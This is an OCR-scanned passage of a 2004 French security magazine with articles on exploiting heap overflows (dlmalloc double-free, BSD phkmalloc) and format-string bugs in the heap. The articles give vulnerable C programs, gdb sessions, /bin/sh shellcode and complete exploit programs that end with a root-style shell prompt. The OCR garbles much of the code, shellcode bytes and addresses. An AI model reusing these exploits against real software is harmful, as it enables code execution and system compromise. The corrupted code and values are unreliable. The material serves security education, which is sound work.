systèmes. Le cas du malloc de 
Doug Lea est relativement 
simple et représente une bonne 
sensibilisation aux overflows 


#include <string.h> dans le tas. 

unsigned char *shel 1code = 

11 <go ahsed 128 bytes. 

"xeb\xgappssssfffft 

1 ..<execve shél1code> 

AXIO\A52 468 AGE KE \X7 SX 6846 BV 427 XF KE \X69 VX BOL LE VKE 2" 
"AXS3BINXELLXANXAR VISE NX CD XBANXB \XCAA YA \KCD\X BU" ; 


#define BUF SIZE 112 
#define FREE ADDR x8949649 
#define BUF_ADDR  8x8949670 


char #nake_buf(int bufsize, 
unsigned fresaddr, unsigned bufaddr){ 


char *buf = (char*)malloc(bufsizerl); 


ifCIbur) { 
perror("mal10c"); 
exit(-1); 
} 
menset(bu*, 'B', bufsize); 
buf[bufsize] = 9; 
memcpy(bu, shellcode, strlen(shellcode) ); 
mencpy(buf#bufsize-12, "Axfetffixf ff fx fe af fx ff", 8) 
fréeaddr -= 12; 
mencpy(buf#bufsize-8, &freeaddr, 4); 
mencpy(buf+bufsize-4, &bufaddr, 4); 
return bu; 
} 


int main()( 
char *buf = make buf(BUF SIZE, FRÉE AUDR, BUF ADDR); 
execl("./vutn", "./vuln, buf, NULL); 
return -1; 

di 

E- xplic -] 


Voilà, il ne reste plus qu'à tester le tout : 


$ ./xpl 


Fffo<Ux08049634<0x88049670> | sh-2.05b$ exit 


exit 
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Heap overflow 


sur BSD 


Dans l'article précédant, on a vu 
comment exploiter le cas d'école 

du double-free() sur un dimalloc | 

(Linux). On va apprendre, dans | 
cet article, comment exploiter un 
heap overflow, cette fois sur BSD. 
La technique présentée repose 
sur la création d'un espace vide 
en mémoire (ou Gap). 
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Sur BSD (FreeBSD, NetBSD 
et OpenBSD), l'allocateur utili- 
sé est celui de Poul-Henning 
Kamp et diffère largement de 
celui de Doug Lea. Il regroupe 
les “chunks' par taille dans une 
seule page. 


Comme précédemment, pour 
les détails algorithmiques, on se 
reportera aisément à la biblio- 
graphie ([1] et [2] 


Organisation en mémoire 
du phkmalloc 


Le phkmalloc sépare 
la mémoire en pages de 
nalloc_pagesize octets (généra- 
lement 4 ko) qui contiennent 
autant de chunks de la même 
taille que possible. Ces pages 
sont rangées dans une liste, par 
ordre de taille des chunks (puis- 
sances de 2 supérieures à 16) 
qu'elles contiennent, L'ensèm- 
ble des informations d'une page 
de chunks "petits" ou "moyens" 
{< taille d'une page) sont stoc- 
kées dans une structure pginfo : 


structure pginfo { 

structure pginfo *next: 
“page; 
size; 
shift; 


void 
u_short 
u_short 
chunks */ 
u short 
u_short 
uint 


} 


/ 
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Les choses intéressantes à 
savoir dans notre cas sont les sui- 
vantes : 
les pages sont stockées à la 

suite les unes des autres en 
mémoire, 

= la structure pginfo des "petits" 
chunks (taille inférieure à 
deux fois la taille de la struc- 
ture painfo nécessaire) est 
stockée au début de sa page, 

next est le pointeur vers la 
structure pginfe suivante, 

page est le pointeur vers le 
début de la page, 

size (2*shift 
taille d'un chunk, 

-les autres champs servent à 
savoir où se situe le chunk libre 
suivant (s'il existe). 

Donc, lors d'une demande 
d'allocation, Le phkmal1oc recher- 
chera, dans la liste des painfo, la 
première page de chunks de la 
bonne taille, et où un chunk est 
encore disponible. Il en allouera 
une nouvelle s'il le faut. Ensuite 
il allouera le premier chunk 
disponible dans la page, qui sera 
à l'emplacement : page plus le 


s1ze)est la 


/* next on the free list */ 
/* Pointer to the page */ 

size of this page's chunks */ 
/* How far to shift for this size 


Hou many free chunks */ 
How many chunk #/ 
Which chunks are free */ 


CEE 


numéro du premier bit à 1 dans le 
champs bits que multiplie size (les 
premiers bits seront roujours à 0 dans 
le cas des petits chunks, étant donné 
que la structure pgtnfo prendra ces 
chunks). 


Les gaps 
Le problème 


Imaginons l'allocation d'un tampon 
de taille moyenne (0x800 : tient dans 
une page, mais n'est pas considéré 
comme "petit"), cela allouera une 
page. Ensuite si l'on demande un petit 
chunk (16 par exemple), il sera mis 
dans une nouvelle page, collée à la 
page précédente, avec la structure 
pginfo au début de la page. On obtien- 
dra donc le schéma-mémoire suivant : 


D 

(6809) | ralloc(Ox822) bufl 
chunk de #x00 Tibre | bufa 

D een 

(GE Re ELU 


malloc(16) buf2 
chunks de 16 libres 


Donc, si on déborde le premier tam- 
pon de plus de 2048 octets (0x800), on 
arrivera à toucher la structure pginfo. 
Dans la suite, on considérera qu'on 
alloue un tampon de 0x800 après cette 
allocation en buf3, pour éviter d'avoir 
à faire un trop grand overflow. Le fait 
d'écraser la structure painfo permet 
de renvoyer l'adresse voulue d'un 
chunk inférieur à 16 octets (taille mini- 
male d'un chunk) au prochain mal loc. 


Exploitation 


En regardant la structure pginfo,on 
se rend compte que le champs next 
doit pointer vers une structure correc- 
te, si un malloc différent à lieu entre 
temps (je ferais probablement un autre 
article sur la manière d'écraser le 
champs next). Ici on considèrera que le 
prochain mal10c est un nal1oc(16). En 
revanche, si on change le pointeur page 
par une adresse de notre cru, alors le 
prochain nalloc(16) renverra notre 
adresse + offset du premier chunk 
Libre, soit notre pointeur + adresse 
basse du dernier malloc(16) + 16. On 


peut produire l'overflow avec quelque 
chose dans le genre : 


<nops><shel1coden' importe quoi><reti 
I<- 899 octets -S1|<- 4 octets ->||<- 


où : 

- retloc est l'emplacement de l'adresse à 
réécrire (par exemple la GOT de free), 

- base est l'adresse basse de du der- 
nier malloc(16). 

Ainsi le malloc(16) suivant renver- 
ra retloc, et il nous suffira alors de 
fournir, dans le tampon devant être 
copié, l'adresse de notre shellcode. 


Exemple 


En prenant ce 
vulnérable : 


programme 


E+ vuin.c +] 


Heap ov 


flow sur BSD 


oc - base - 16> 
Aoctets ->| 


On fait donc d'abord les deux allo- 
cations qui créent le trou en mémoire 
en <1> et <2>, Ensuite on fait l'allocation 
de notre tampon de commodité en <>. 
L'overflow tel que décrit ci-dessus se 
fera en <4> et si on le réalise correcte. 
ment, on obtiendra en <ÿ> notre retloc, 
et en <6> on pourra écrire l'adresse de 
notre shellcode qui sera exécuté en <7> 
grâce à la réécriture de la GOT de free. 

Il nous faut à présent trouver l'a 
dresse de retour et l'adresse basse du 
premier malloc(16), pour cela, un petit 
coup de gdb : 


<nops><shel 1code><n' importe quoi»<retloc - base - 16> 


#include <stdlib.h> 
#include <string.h> 
#include <stdio.h> 


Ant main(int ange, char ##argv) { 
cher *pl, *p2, *p3, *pd; 
Aflarge = 3) 

exit(-1); 


pl = (char*)malloc(2x882); <1> 
p2 = (char*)malloc(16); <2> 


p3 = (char*)malloc(Gx828); <3> 
printf('Strepy 1\n°); 
strepy(p3, arav[11); <4> 


p4 = (char*)malloc(x19); <5> 


printf("Strepy 2\n"); 
strepy(p4, argv[21); <&> 


tree(pl) ; <> 
free(p2) ; 
free(p3) 
free(p4); 
return 8; 
} 


£- vuln.c -] 
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I<- 8gn octets ->||<- 4 octets ->|I<- 


4octets ->| 


On voit donc que notre premier 
tampon sera alloué en 0x08049670, ce 
sera donc notre adresse de retour. 
Enfin, on veut changer l'adresse de 
free pour pouvoir appeler notre shell- 
code (.got overwriting, voir article sur 
l'ELF Smashing, Manuel 6), un petit 
objdump et c'est parti. 
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$ gdb -q ./vuin 

(no debugging symbols found)... 

(gdh) disassenble main 

Dump of assembler code for function main: 


SxB048094 <nain>: push #ebp 
Dx8048905 <maintl>: mov  Yesp,Xebp 

Sx8848997 <na in sub  $0x18,#esp 
SxB04ROOS <main+6>: 3833 ,8x8(ebp) 
#x894899e <main+18>: je  GxB/4B9D0 <naint2E> 


BxB0489a0 <main+12>: add SOxF FFF FF F4, Resp 

GxB4803 <maintlB>:  pusn  SExFFFF FFE 

Ox88489a5 <main+-17>: call  Oxe0486a4 <exit> 

BxB0480aa <main+22>: add $0x19,tesp 

DBa4Bgad <mint25>: lea pxDCHest) nest 

Bx28489b0 <main+28>: add SOxF FFF FF F4, Resp 

#x80489b3 <main+31>: push  $Axa0g 

DxBD489D8 <mainr36>: call  Bx80866 <nalloc> <> 

6x80489bd <main+41>: add SOx19,tesp 

DxBH480CE mind»: mov %eax,eax 

#x38489c2 <main+46>: mov Meax OxFFFFFFFC(Rebp) 

Ex80489c5 <main+49>: add SOxFFFFFFF4,Xesp 

DxSB480c8 <maintS2>: push SEXL 

Bx30489ca <main+54>: call  Ox8948664 <mal1oc> <2> 
S0x18,tesp 


BxB8489cf <main+59>: add 


End of assembler dump. 

Ladb) b *x82480b8 

Breakpoint 1 et 9x66489b8 

Ladb) b *x82480ca 

Breakpoint 2 at PXBAB2Ca 

{gdb) r à b 

Starting progran: ./vuln à d 

{no debugging symbols found)... (no debugging symbols 
found)… 

Breskpoint 1, AXB%489b8 in nein () 
{gdb) nexti 

GxB0480hd in main () 

{gdb) info register eax 


eax xD 1bAGG 134524928 <> 
(adb) cont 

Continuing. 

Breakpoint 2, Gx82489ca 1n main () 

{gdb) next 

#x8g489cf in main () 

{gdb) info register eax 

eax Gxe0icp30 1345290972  <4> 
{gdb) quit 


The program is running. Exit anymay? (y or n) 

Le breakpoint sur <1> (premier malloc) nous renvoie en 
<3> Ox804b000 et le deuxième sur <2> (deuxième melloc) 
nous renvoie en <4> Ox804c030. Donc, notre shellcode se 
trouvera dans le deuxième nalloc(8x88ÿ) donc en 
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0x804b800. L'adresse basse du premier mal loc(16) sera 
donc 0x0030. 
11 nous reste à déterminer la got de free : 


# cbidunp -R ./vuln | grep free 
98949c06 R 386 JUNP_SLOT free 


Donc : 


-retloc - base - 16 = 9x8049c59 
-retaddr = 2x894b894 


Finalement, notre overflow ressemblera à : 
<shellcode><padding><8x28049c50> 
\ 2 

2952 octets 


Et en deuxième argument on passera : <Ax844b800> 
Voici l'exploit correspondant : 
[+ xpl.c +] 


#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 


unsigned char *shellcode = 
"xeb\x19\x31\xcD\xBe\ 168 \x 61x87 \xBd\xLe\x89" 
“LEA \IBUBILAG LAC \XE A XBd\x 4e PB IE 1\K56" 
"DAV D SP \xcd\xBZ\xeB \xe2\x FF XF XP A2" 
'AXG2\X69 16e \K2FVX7 I X6B\X23" ; 


#define RETLOC dx08949c00 
#derine RETADDR 9xp84b801 
#define BASE_ADDR 9x0930 
#define BUF SIZE 0x800 
#lefine S323ITS 4 
char? make_pverflon() { 

char *bu: 

int size = S32BITS*24BUF_ SIZE; 


unsigned int retluc = RETLOC - BASE ADDR - 9x19; 
buf = (char*)malloc(size#1); 
1fCbuf) 

return HULL; 


buf[size] = 8; 
menset(buf, 'b', size); 
memcpy(buf, shellcode, strlen(shellcode) ); 


mencpy(buf + size - S32BITS, tretloc, S32RITS); 
return buf; 
} 


Ant mainC) € 
char *buf; 
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Heap overflow sur BSD 


char buf2[8]; 
unsigned int reteddr = RETADDR; 


buf = make_overflon(); 


memcpy(buf2, kretaddr, 53281TS): 


buF2CS328ITS] = 6; 


execle"./vuln", ./vuin", buf, 
retumn 8; 

+ 

= xpl.c -] 


Conclusion 


Après une introduction aux 
heaps overflows par le cas du 
dlmalloc, ce cas de base du 
phkmalloc montre une possibi- 
lité d'exploitation sur un autre 
allocateur qui, contrairement à 
buf2, NULL); | ce qui a été prétendu pendant 

plusieurs année, n'est pas 

infaillible à ce genre de faille. 
De nombreuses autres possi- 

bilités s'offrent pour exploiter 


Voilà, il ne reste plus qu'à tester le | des cas de heap overflows. Plus globa- 


tout : 
bash-2.95b$ ./xpl 
Strepy 1 

Strepy 2 

s exit 


i 


lement, à partir du moment où un 
débordement est susceptible de tou- 
cher aux structures de contrôle de l'al- 
locateux il y a une possibilité pour que 
l'overflow soit exploitable. 


pe JOURNA 


oo te Hat nes | 


PT 
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Exploiter les format 


L'exploitation des bugs 


de formatage dans le tas est plus 


difficile que dans la pile : 


on ne contrôle pas directement 
les adresses de la mémoire que 
l'on peut faire modifier par printf 
ou sprintf. Cet article présente 


une technique qui permet 
de contourner ce problème. 


Dans cet article, nous allons étu- 
dier une technique d'exploitation des 
failles dites de " bug de chaîne de for. 
mat ", Cela requiert quelques conne 
sances préalables dans ce domaine et 
sur le fonctionnement de la pile lors 
de l'exécution d'un programme, 
notamment durant l'appel, le prologue 
et l'épilogue d'une fonction (pour plus 
d'informations, reportez-vous à la syn. 
thèse de Ouah [1], par exemple). 

Nous allons tout d'abord faire 
quelques rappels et nous verrons La 
description d'une exploitation simple, 
dans laquelle la chaine de format se 
trouve dans la pile (stack). Ensuite, 
nous étudierons une 


nique de riq & gera présentée dans 
l'article "Advances in format string 
exploitation" de Phrack #59, pour le 
cas où la chaîne de format se situe 


dans le tas (ou heap, ie: allouée par 


un appel à malloc). 

NB: Tous les tests ont été effectués 
sur une Debian 3.0 avec gec 2.95.4 et 
la libc 2.2.5 


technique | 
d'exploitation, dérivée d'une tech: | 


BY EZEKIEL 


Comment fonctionnent 
les bugs de formatage ? 


Les bugs de formatage concernent l'utilisation des fonctions de la 
famille de printf, qu| permettent de construire des chaînes à partir 
d'un moclèle (par exemple "joueur %s : score %d”, où les opérateurs 
de conversion %s et %d seront remplacés par le contenu de 
variables données). Si l'utilisateur peut contrôler ce modèle, ll peut 
utiliser volontairement certains opérateurs qui permettent d'écrire 
dans la mémoire. 


Opérateurs de conversion exploitables : 
“en : le nombre de caractères écrits Jusqu'à ce moment du forma- 
tage, est stocké dans un entier indiqué par un pointeur int* (autre- 
ment dit, le compteur interne est copié à une adresse donnée de 
la mémoire, sur 4 octets pour architecture 32 bits). En réalité, 
c'est le nombre de caractères qui auraient dû être écrits qui comp- 
te, comme on le Voit dans avec le programme suivant : 


#include <stdio.n> 

int main(void){ 
int 15 
char toto[256]; 
smprintf(toto, 256, "£.39gu%n", 1, &i); 
printf("Valeur de i : Æd\n', 1); 
return(@); 

} 


affichera 300 comme valeur de i lors de son exécution, alors 
qu'on limite l'écriture à 256 caractères. On notera aussi que ces 
opérateurs n'ont aucun effet sur le formatage. 

Lors d'une exploitation, l'adresse de i (&i de l'exemple précédent) 
sera une autre adresse qu'on aura disposée dans la pile : par 
exemple l'adresse d'exit{) dans la PLT, ou une entrée de la dtors, 
que l'on voudrait détourner vers un shellcode. L'article explique 
comment exploiter un bug de formatage lorsqu'on ne peut juste- 
ment pas placer explicitement une adresse dans la pile. 

“%hn : identique au %n sauf qu'on écrit un short int (2 octets sur 
architecture 32 bits) à la place d'un int. 

“m$ : permet d'accéder directement au paramètre numéro m. 
Lorsque le modèle contrôlé par l'utilisateur se trouve sur la pile, à 
partir d'un certaïh numéro, les variablés (ou paramètres) seront 
prises au début de ce tampon, Par exemple, "AAAABBBB-%12$x- 
%13$x" affichereit AAAABBBB-41414141-42424242, où 
0x41414141 est l'entier correspondant à AAAA en mémoire (idem 
pour BEBB et 0x12424242). 
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Exploiter les format bugs dans 


t bugs dans le tas 


Rappels : format bug dans la pile 


Soit le programme vulnérable 
suivant : 


vuln_simple.c -- 


# 


* simple stack-based format string bug 
+} 


#include <stdio.h> 

Ant matncint arge, char *argv[1){ 
char bufferC256]; 
if CGarge < 2) 

exit(1); 

stmnepy(buffer, argv[1], 256); 
printf(buffer); 
return(2); 


RS E0F 


On compile : 
$ gcc -o vuln simple vuln simple.c 
-88db 

Le buffer dans lequel la chaîne de 
format va être convertie étant sur la 
pile, on est dans le cas d'une exploita- 
tion très simple. 

On recherche donc le numéro de 
paramètre à partir duquel on retombe 
sur la chaîne de format elle-même 
{voir encadré) : 


$ ./vuIn_stmple 'AAAA %68x" 
AARA ALAÏALAL 


Ouais, du premier coup... Bon, d'ac- 
cord, j'ai un peu triché : j'ai dû faire 
plusieurs essais ; P L'offset est donc 6. 
Maintenant que l'on connaît l'offset, 
on va mettre un shellcode dans 
l'environnement pour pouvoir jumper 
dessus. 


$ gdb vuln_ simple 
(A) 
(gdb) b Amain 


(adb) r AMA 


T { 

(adb) x/s OxbffFFF16 
oxbtFf#FI6: 
(gdb) x/s pxbffFFF20 
DxbrFFFF20: 


L'adresse de notre shellcode est 
donc Oxbfffff20. Maintenant que l'on 
sait ce qu'on doit écrire, il reste à 


pour les adresses à écraser, comme, par 
exemple, la section _ deregister_ 
frame_info ou la section .dtors. C'est 
certe dernière que l'on a choisie, récu- 
pérons son adresse : 


$ objdunp -x vuln_simple | grep dtors 
18 .dtors 
28949634 
1 


d .dtors 0090009 


Le début de la section .dtors est à 
l'adresse 0x08049634, on va donc éri. 
re à l'adresse 0x08049634 + 4 (voir [41). 
On récapitule : on va écrire Oxbfff 
en Ox0804963a et Oxffl6 en 
0x08049638, construisons notre chaîne 

| de format sous gdb : 


(gdb) r ‘echo -e 


Ce. 


Cgdb) c 
Continuing. 


$ export SHELLCODE="echo -e "\x31\xe0\x59\x68Lx2F\x2f\x7 21x68 \x68 


Lef\x62\x69\x62\x89\xe3\x 51x53 \x89\xel 


On va exploiter le programme vul- 
nérable directement sous gdb : 


Ax99\xbZ\xBb\xcd\x80" 


sh-2.05a$ 
niark niark ;) 


MAI-JUIN 2004 


savoir où. On a plusieurs possibilités | 


Breakpoint 1 at Gx8048460: file vuln simple.c, Tine 7. 

Starting program: /home/ezekiel/papers/zezek/vuln_simple AAAA 
Breakpoint 1, main (arge=134513760, arçv=9x2) at vuln_simple.c:7 
"'SHELLCODE=1APh//shh/bin\211aPS\2114\231°\vI\209" 


"1APh//shh/bin\211aPS\2114\231°\vI 26" 


Maintenant que l'on a vu la métho- 
| de "facile", on va regarder ce qui se 
passe si la chaîne de format est dans 
le tas plutôt que dans la pile. 


Format bug dans le tas 


Dans cette section, on va tenter 
d'exploiter le programme vulnérable 
suivant : 


aogonn OAGA0G3£ DRGANG3A OHAAAERA 2442 


------ heap fnt.c 
#include <stdio.h> 
void vuln(char *s){ 
char *niark = (char *)ma110c(1924); 
snprintf(niark, 1924, s); 
fres(niart) ; 


} 
int mainlint arge, char *argv[1){ 


'\xa\x96\x04\xPE\x38\x06\x04\x88%491430%6$hn%16161u%7 $hn °° 


Program received signal SICTRAP, Trace/breakpoint trap. 
8x499712d8 in _start () from /1ib/1d-1inux. s0.2 


char *buf; 
if Cargc > 2) exit(1); 
buf = strdup(argv[11); 
vuinbuf) ; 
return(g); 


ai 


2 


Avant de parler de la technique 
d'exploitation, on peut déja voir deux 
clioses importantes : 

- le buffer buf est dans le tas (strdup 
effectue un appel à malloc ()), donc 
le paramètre s de vuln aussi, comme 
prévu ;) ; 

= buf n'est pas affiché à l'écran, on ne 
peut donc voir son contenu qu'a l'aide 
de gdb. 


On suppose aussi que, pour l'ex 
ploitation, on ne peut fournir qu'une 
seule chaîne de format au programme 
vulnérable. La technique de gera & riq 
{voir l'article [2) consiste à générer des 
pointeurs à l'aide des saved ebp se 
trouvant sur la stack. Le saved ebp 
d'une fonction appelée pointe sur le 
saved ebp de la frame de la fonction 
appelante. C'est ici que les choses 
deviennent intéressantes =) La 
technique consiste donc à utiliser cette 
propriété pour générer des pointeurs, 
que l'on pourra ensuite utiliser pour 
écrire la valeur de notre choix à 
l'endroit de notre choix (sur un saved 
ebp ou un saved eip, par exemple). 


Le frame pointer est ton ami 


Prenons un exemple coneret : si l'on 
veut écrire à l'adresse OxbadcOded, on 
va générer un pointeur sur cette adres- 
se de la façon suivante. 


Notation : 
LSB=Least Significant Bytes 
(Octets de poids faible), 
MSB=Most Significant Bytes 


(Octets de poids fort). 


1- Utiliser la frame B, qui pointe déjà 
sur la frame C, pour écrire sur le 
LSB de celle ci. 


2: Grâce à la frame A, modifier le LSB de 
la frame B pour la faire pointer sur le 
MSB de la frame C (ie. on l'incrémen- 
te de 2 sur une architecture 32 bits). 


3: Du coup, on peut modifier le MSB 
de la frame C. 


LC LSBIMSB ] —» [LSB+2 | MSB]—! 
[ nent AL 
[ ET OT 
F te RIAANNT 
Frame À Frane 8 
On a bien |[... 
OxbadcOded surle | Saved registers: 
ebp de la frame C, 
on peut mainte- | (gdb) x/4Ux $es) 
nant l'utiliser Le 


pour écrire 2 bytes | axbffffbld: (. 

(avec %hn) à cette | axbrffrbad. 

adresse. SxbfFFFD34 
Bxbr ff fb44. 

Le problème sur 

TRE GxbffFfba4: 


En fait, gera & riq utilisent abon- 
damment l'option de "direct parameter 
access" (Le. %m$) pour générer leurs 
| pointeurs, le problème c'est que leur 
technique ne fonctionne pas sous Linux. 
En effet, pour écrire à une adresse don- 
née, ils générent un pointeur grâce à 
leur technique et réutilisent ce pointeur 


v 
LSB | MSB ] —æ [LSB+2 | MSB] Chded | MSB] 


v 
Cäded | badc] 


CC 8x40082800 ] 


en y accédant par %m$, tout ça dans la 
même chaîne de format, Sous Linux, cela 
est impossible car vsnprintf, qui est la 
fonction interne à toutes les fonctions de 
la famille de printf (snprintf, 
sprint, fprintf, erc.), sauvegar- 


[ de les valeurs des paramètres 
à ] L ] [ 1 avant l'appel. Ce qui fait que si 
c ] [ UE 1 l'on génère un pointeur, on ne 
£ 1 CARRE QU: 1 pourra pas l'utiliser pour écrire 

Frame À Frane 8 Frame C en “direct parameter access”, 


car on ne pourra accéder qu'à 
l'ancienne valeur du paramètre. 
Vérifions cela grâce à notre pro- 
gramme d'exemple : 


On met un breakpoint 
1 juste après l'appel à 
1 snprintf() pour pouvoir obs- 
] erver l'état de la pile après 
coup. On observe : 


ebp at Sxbffffble, eip at GxbfFfFD22 


6x588497a8 À [ Oxbffffbdc 1 
exbfFfFb48 BxH80484b9 
exbFFfFh58 0x40043f18 


0xp8048411 “ 


2x28049768 7 oxbtFFFbB8 ] 


Le saved ebp de la frame A pointe 
donc sur le saved ebp de la frame B, 
comme prévu. On va écrire la valeur 
hexadécimale OxcOde (49374 en base 
10) sur la frame B en utilisant la frame 
À, et ensuite essayer d'utiliser le poin- 
teur construit pour écrire la même 
valeur à l'adresse Oxbfffc0de, 


(gdb) r ‘#.49374uSB5hn828$hn xxx00X000000RREXIARANIINENIINX KI 


#0. 
LLSB | MSB1 —> [LSB | MSB ]—> [LSB | MSB] Cgdb) x/44x sesp 
[ "y L 1 [ 1 D. 
[ 1 [s 1 £ 1 exbFfffafds (. 0x00009406 0x08949768 : 
Des AT Péartdl [s ] xb FFF FbD Bx4ÿ6135cc Bxbffffbbé 
Frame À Frame B Frame C | Ox@B0497a8 A C éxbffffbdc ] 
OxbFFFFb48 OxA80484b9 
devient : OxbT ET Fh5E DxAGA3TIB 
LLSB | MSB] —>-[LSB | NSB ] —» [üded| MSB] exbFFfFb44: 0x08049768 BC Oxbfffcfde 1... 
[e 1 L 1 [ 1 
[ 1 C 1 [ 1 ExbFFFFbB4: axBGägcace ? xABBABAIL  (...) 
£ 1 nl [ 1 (adb) x/x Oxbfffcüde 
Frame À Frame B Frane € exbtftcude: CPE 
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Le LSB du saved ebp de la 
frame B a bien été modifié en 
OxcÜde. Par contre, la valeur 
pointée par le nouveau saved 
ebp de la frame B n'a pas chan- 
gée car, comme expliqué ci-des- 
sus, snprintf a utilisé une valeur 
qu'il avait sauvezardée. 

NB. : les xxx servent de pad- 
ding pour avoir un argument de 
même taille qu'au-dessus et ainsi 
retrouver les mêmes valeurs, En 
effet, les adresses de frame chan- 
gent selon la taille des argu- 
ments et de l'environnement, car 
ceux-ci sont stockés dans le bas 
de la pile. 


Exploitation 


11 est temps de parler de la 
technique d'exploitation propre- 
ment dite :). La technique de riq 
& gera ne fonctionnant pas direc- 
tement sous Linux, il nous faut la 
modifier un peu pour pouvoir 
exploiter ce programme vulnéra- 
ble. L'idée est donc la suivante : 


de la pile avant la conversion de 
la chaîne de format. 


Figure 1 


Puisque l'on ne peut pas uti- 
liser le "direct parameter 
access", on ne peut accéder aux 
valeurs de la pile qu'en les 
*popant" (ie. avec des %x suc- 
cessifs). Donc on va poper les 
valeurs de la pile jusqu'à arriver 
au saved ebp de la framé A, que 


Exploiter les format bugs dans le tas 


l'on va utiliser pour écrire sur le 
saved ebp de la frame B, et faire 
pointer ce dernier sur le saved 
cbp de la frame À (figure 2). 


Figure 2 


Ensuite on va poper les 
valeurs de la pile jusqu'à la 
frame B, et on va l'utiliser pour 
réécrire le LSB du saved ebp de 
la frame A pour le faire pointer 
dans l'environnement dans 
lequel on mettra l'adresse de 
notre shellcode et notre shelleo- 
de lui-même (figure 3). lei, on est 
dans le cas d'un "frame pointer 
overwriting", cette technique, 
qui est maintenant un classique, 
a été bien expliquée par klog 
dans [3]. 


à 


RE a 


Figure 3 


(gdb) symbol -file heap_mt 


Reading symbols from heap_fnt...done. 


(gdb) b *vuin+48 


Création de l'exploit 

Pour pouvoir exploiter le programme 
vulnérable, il nous faut l'adresse de la 
frame À, qui ne sera pas la même que 
dans l'exemple ci-dessus. En effet, l'en. 
vironnement n'étant pas le même, les 
adresses de frame seront décalées. Nous 
allons donc imposer l'environnement 
d'exécution en appelant le programme 
vulnérable à partir d'un "faux" exploit : 


- fake sploit.c — 
#include <stdio.h> 
#include <stdlib.h> 
Hdefine FUT_SIZE 256 

#dafine VULN "heëp_fnt" 

char shellcode(] = "AAMABBE" 

“Tr A xS0\x68//Sh\x6B/ Din \xBO va 3" 
"\BD\XS3\x89\Xe 11x99 \Xh9 XD \Kcd\xBD! ; 


int main(int arc, char *argv[1){ 
char Feke_fnb[FMT_51ZE); 
char *args[] = { VULN, fake_fmt, HULL }; 
char *env[] = { shellcode, NULL }; 
memset(fake_fnt, 'A', FUT_SIZE); 


fake_fnt[FMT_ SIZE - 11 = 8; 
execve(VULN, args, env); 
/* never raached */ 
return(f); 


MB. : Les "A! qui ont été mis au 
début du shellcode seront remplacés 
dans l'exploit par un ebp bidon, et les 
"B* seront remplacés par l'adresse de 
notre shellcode (pour ceux qui ne 
voient pas pourquoi, je vous invite à 
relire le papier de klog déjà cité ci-des- 
sus). On récupère l'adresse avec gdb : 


ezekiel@psyche zezek]s gdb fake_sploit 


gdb) r 
..] 


On charge les symboles du pro- 
gramme vulnérable : 


Ereakpoint 1 at Gx8948549: file heap_fmt.c, line 5. 


Cdb) © 
Continuing. 


Breakpoint 1, 6x08948509 in vuin (s-2»8049768 'A' <repeats 200 times>..….) at heap_fnt.c:5 


ii snprintf(niark, 1924, s): 
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On a placé le breakpoint au même endroit que tout à 
l'heure, c'est-à-dire juste après le retour du snprintf (). L'a- 
dresse de notre frame A doit se trouver dans ebp. 


Cadb) À r ebp 
ebp GxbFfffd9c GkbFFFFAQC 

Voilà notre adresse =) c'est en fait l'adresse de la frame 
de la fonction vuln(). Assez tourné autour du pot, passons 
au code de l'exploit : 
cure xpl_heap_fmt.c ------ 
#inelue <stdio.> 
#incluce <stdib.h> 
#include <string.h> 
#define FAT SIZE 
#define VULN 
#Hdefine COPYCx, y) 
#define LSB(x) CG) & Gxffff) 
#define STACK exbfrffffe 
#define OFFSET_FRAMEA 8 
#define OFFSET_FRAMEB 29 
#define ADDRESS FRAMEA Bxbffffo9c 
#define DUMYY Axbadc@ded 


256 
“heap_fmi" 
#(void x = (void *)(y)5x += 4 


char shellcode[] = "\x31\xc0\x50\x68//sh\x68/bin\xB9\xe3" 
"VLE\KS3 1x8 \xe1\x99\XbE\XAbAXCA\XEG" ; 


unsigned int calc_padding(unsigned int write_word, 
unsigned int already_wrtien){ 
/* Calculé le nombre de caractère à sortir pour que la valeur 
écrite par le prochain %hn corresponde à write_word */ 
ft. 
k 


Ant main(void){ 
char #fnt = (char *)malloc(FMT_SLE): 
char *egg = (char *)malloc(sizeof(shellcode) + 8j: 
unsigned Tong fake_frame = 
STACK - st260f{VULN) - (sizeof{shel Icode) + 8); 
int already_written = 9; 
int already_popec = 4; 
char *ptr = fat; 
char *args[] = { VLN, fmt, NULL }; 
char *env[] = £ eg, NULL }; 
int pad; 
int À; 


/1/ poper jusqu'au saved ebp de la frame À 
while(alreacy_poped < OFFSET_FRAMEA - 2) { 
strepy(ptr, "K8x") ; 
ptr += 4; already_vritten += 8; aïready_popedt+; 
} 


{/4 l'utiliser pour écrire sur le saved ebp de la frame 8 
pad = calc_padding(LSB(ADDRESS FRAMEA), &lready_writien); 
already_ written 4= pad; 
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sprintf(ptr, "Aiiddtthnan", pad, &i)s 
already_poped += 2; 
ptr += 


{// poper jusqu'au saved ébp de la frame B 
while(areedy_poped < OFFSET_FRAMES - 2) { 
strepy(ptr, "#8x"); 
ptr += 4; already written += 8; alreadÿ_popedtt; 


} 


/// utiliser le saved ebp de la fiame B pour modifier 
// le saved ebp de la frame À 
pad = calc_padding(LsB(fake frame), already written); 
already_written += pad: 
sprintf(pir, “étéddéthnan", pad, 81); 
already_poped += 2; 
ptr +=; 


{14 on rajoute du padding à la fin de la chaîne 
// de manière à avoir une longueur constante 


menset(ptr, 'A', fmt + FUT SIZE - ptr - 1); 
pr + fmt + FMTLSIZE - ptr - 1: 

#ptr = 6; 

ptr = ecg; 

COPY(ptr, DUMY); /ltake ebp 


COPY(ptr, fake_frame + 8); //fake_eip: adresse du shellc. 
strepy(ptr, shellcode): 

fprintf(stdout, "Launching xploiti\n"); 

execve(ULN, args, env); 

return(g): 


On compile : 
Cezekiel@psyche zezek]$ gcc -0 xpl_heap_fmt xpl_heap_fnt.c 


Et on exécute : 
Lezektel@psyche zezek]$ ./xpl_heap_fmt 
Launching xploit! 
sh-2.05a5 


Mmmhkh, ça a l'air de fonctionner comme prévu :) 

Dans l'article qui suit, nous allons voir un autre exem- 
ple utilisant une technique similaire à celle que l'on vient 
de détailler. 


Bibliographie : 


Hl Exploitation avancée des buffer overflows par OUAH 
http;//ouah kemsh.org/adrbotpaf 

{2 Advances in format string exploitation par gera, riq 
http://wv.phrack.org/ phrack/59/n59-0x07 Dit 

31 The Frame Pointer Overwrite par klog 
Mttp://www phräck.org/phrack/55/P55-08 

[A Overwriting the .dtors secrion par Juan M. Bello Rivas 
tp; /wwwa.synnergy.net/papers/ dtors tt 
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Un format bug plus 


Un format bug 


plus vicie 


Jouons 
avec la pile 


La technique de l'article 
précédent était encore simple 
comparée à ce qu'il faut faire 

